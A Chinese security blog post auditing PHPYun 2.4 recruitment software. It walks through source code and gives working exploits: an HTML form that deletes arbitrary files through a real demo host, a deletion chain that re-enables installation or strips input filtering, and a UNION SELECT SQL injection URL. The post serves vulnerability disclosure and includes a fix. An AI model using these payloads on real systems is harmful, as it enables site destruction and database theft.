您的位置 » 首页 » 代码审计,实用工具 » 代码审计:PHP云人才系统任意文件删除漏洞 引发sql注入/重新安装二次漏洞

代码审计:PHP云人才系统任意文件删除漏洞 引发sql注入/重新安装二次漏洞

发表于4年前 | 作者: seay | 分类: 代码审计, 实用工具 | 孵化于:2012年11月17日 | 文章热度:8,366 次 全屏阅读

显示不全请点击全屏阅读

PHP云人才系统 PHPYun为 PHP100旗下产品。
下载源码:http://www.phpyun.com/phpyun_2.4_GBK_Beta.zip 2.4版本的
先看根目录下index.php文件:
 
<?php
include(dirname(__FILE__).”/global.php”);
********省略***********
$act = $_GET[‘act’];
$task = $_GET[‘task’];
********省略***********
require(MODEL_PATH.’class/common.php’);
require(“model/”.$act.’.class.php’);//包含model/下的class.php文件
$conclass=$act.’_controller’;
$actfunc=$task.’_action’;
$views=new $conclass($phpyun,$db,$db_config[“def”],”index”);//实例化一个类
if(!method_exists($views,$actfunc)){
$views->DoException();
}
$views->$actfunc();//访问url:index.php?act=ajax&task=delupload将调用model/ajax.class.php中ajax_controller类的delupload_action函数
?>
来到根目录下的global.php
 
error_reporting(0);//关闭了错误显示
………………………………….
if($_GET[act]!=”admin_template”){
include(CONFIG_PATH.”db.safety.php”);//包含了data/db.safety.php文件
}
再看data/db.safety.php文件
 
<?php
function quotesGPC() {
$_POST = array_map(“addSlash”, $_POST);
$_GET = array_map(“addSlash”, $_GET);
$_COOKIE = array_map(“addSlash”, $_COOKIE);
}
function addSlash($el) {
if (is_array($el))
return array_map(“addSlash”, $el);
else
return addslashes($el);
}
function gpc2sql($str) {
$arr=array(” and “=>” an d “,” or “=>” Or “,”%20″=>””,”select”=>”Select”,”update”=>”Update”,”count”=>”Count”,”chr”=>”Chr”,”truncate”=>”Truncate”,”union”=>”Union”,”delete”=>”Delete”,”insert”=>”Insert”);
foreach($arr as $key=>$v){
     $str = preg_replace(‘/’.$key.’/isU’,$v,$str);
}
return $str;
}
function common_htmlspecialchars($str){
    $str = preg_replace(‘/&(?!#[0-9]+;)/s’, ‘&amp;’, $str);
    $str = str_replace(
    array(‘&’,'<‘,’>’,'”‘,’and’,”‘”),
    array(“&amp;”,’&lt;’,’&gt;’,’&quot;’,’an d’,”&acute;”),
    $str);
    return gpc2sql($str);
}
foreach($_POST  as $id=>$v){
$_POST[$id]=common_htmlspecialchars($v);
}
foreach($_GET  as $id=>$v){
if(!is_array($v))
$v=substr(strip_tags($v),0,80);
$_GET[$id]=common_htmlspecialchars($v);
}
 
foreach($_COOKIE  as $id=>$v){
$v=substr(strip_tags($v),0,52);
$_COOKIE[$id]=common_htmlspecialchars($v);
}
?>
可以看到对$_POST、$_GET、$_COOKIE的值都进行了过滤、转义,XSS、sql注射都很难了。
好了那么问题出在mode/ajax.class.php。
来看mode/ajax.class.php中的delupload_action函数
 
function delupload_action(){
if(!$this->uid || !$this->username || $_COOKIE[“usertype”]!=2){//需要先注册一个企业用户再登录,企业用户usertype为2,个人用户需要修改cookie
echo 0;die;
}else{
$dir=$_POST[str][0]; //POST表单中设置[str][0]的值就可以删除任意文件了
echo @unlink(“.”.$dir); //调用了unlink函数删除文件
}
}
构造html文件:
 
<form action=”http://demo.phpyun.com/index.php?act=ajax&task=delupload” method=”post”><br>
    要删除的文件:<input type=”text” name=”str[0]” value=”/robots.txt” size=120><br>
    <input type=”submit” value=”提交”>
</form>
提交后robots.txt文件删除了

 
如果删除/data/phpyun.lock可以重新安装
如果删除/data/db.safety.php则没有进行对$_POST、$_GET、$_COOKIE进行过滤了
比如删除/data/db.safety.php后可通过mode/ajax.class.php中getzphcom_action函数进行sql注入:
 
function getzphcom_action(){
extract($_GET); //$jobid=$_GET[“jobid”]
if(!$jobid){
$arr[‘status’]=0;
$arr[‘content’]=iconv(“gbk”,”utf-8″,”您还没有职位,<a href=’index.php?act=login&usertype=2′>请先登录</a>”);
}else{
$row=$this->obj->DB_select_all(“company_job”,”`id` in ($jobid)”);//$jobid没有单引号,闭合前面的)即可进行注入
foreach($row as $v){
$data.=$v[name].'<br>’;
}
$arr[‘status’]=1;
$arr[‘content’]=iconv(“gbk”,”utf-8″,$data);
}
echo json_encode($arr);
}
注入:访问/index.php?act=ajax&task=getzphcom&jobid=-1) UNION SELECT 1,2,concat(user(),0x7c,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
本地测试注入成功,demo.phpyun.com测试注入不成功。
 

 

 
修复方案:

只允许用户删除用户上传的特定文件。

Tags:

PHPyun漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1668/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)